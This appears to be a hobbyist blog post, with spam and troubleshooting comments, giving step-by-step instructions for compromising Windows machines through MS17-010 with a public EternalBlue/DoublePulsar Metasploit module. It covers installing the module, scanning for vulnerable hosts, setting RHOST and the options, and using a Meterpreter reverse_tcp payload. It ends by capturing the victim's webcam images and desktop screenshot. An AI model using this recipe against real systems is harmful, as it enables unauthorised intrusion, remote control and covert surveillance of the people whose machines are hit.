LFI to RCE via access_log injection

Eternalblue and Doublepulsar with Metasploit

Just wanna share it..

I'm using this msf module https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.

Clone it and copy paste eternalblue_doublepulsar.rb to /usr/share/metasploit-framework/modules/exploits/windows/smb/.



Run msfconsole and scan your local network with auxiliary/scanner/smb/smb_ms17_010 (MS17-010 SMB RCE Detection).



Now use the exploit exploit/windows/smb/eternalblue_doublepulsar.
Set the necessary options like RHOST, TARGETARCHITECTURE, TARGET and PROCESSINJECT.
For DOUBLEPULSARPATH and ETERNALBLUEPATH, use Eternalblue-Doublepulsar-Metasploit/deps/ directory. For example /root/Eternalblue-Doublepulsar-Metasploit/deps/.
Don't forget set the PAYLOAD windows/x64/meterpreter/reverse_tcp (my target use x64 so i'm using x64 payload too).

 

If everything sets, now run exploit.




Run some interesting command like webcam_list or webcam_snap

 



The victim desktop screenshot.

 

Tested on my local network, tool used Metasploit running in Kali Linux.
Thats it, happy hacking!

Comments

ark beacon ids said…
Hello, i did "dpkg --add-architecture i386 && apt-get update && apt-get install wine32" and stuck in boot loop after reboot (enter root, password, press login, but it went back to login screen), i am running kali 2016.2, what can i do ?



i got this error in metasploit? what im i doing wrong ? i moved the filles to the directory as shown in the video.
sh: 1: cd: can't cd to /root/Eternalblue-Doublepulsar-Metasploit/deps/
wine: cannot find L"C:\\windows\\system32\\Eternalblue-2.2.0.exe"
Nonton Film Streaming Movie Indo di Duniafilm21 atau Dunia21, untuk alamat lengkapnya anda bisa cari di google Duniafilm21
Henry said…
This is a very effective method and I haven't seen it before. Now it's time to avail shutters in birmingham for more information.
Henry said…
This comment has been removed by the author.
Apakah kalian ingin mencari situs streaming film yang paling keren, coba pengganti dutafilm disini, yakni Savefilm21
Max Roy said…
This comment has been removed by the author.